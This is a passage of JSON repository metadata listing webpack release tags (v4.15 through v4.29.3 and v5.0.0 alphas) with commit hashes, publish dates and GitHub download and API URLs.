epositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-